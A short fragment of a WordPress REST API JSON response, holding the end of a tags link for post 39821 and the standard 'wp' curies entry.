%2Fv2%2Ftags&post=39821"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}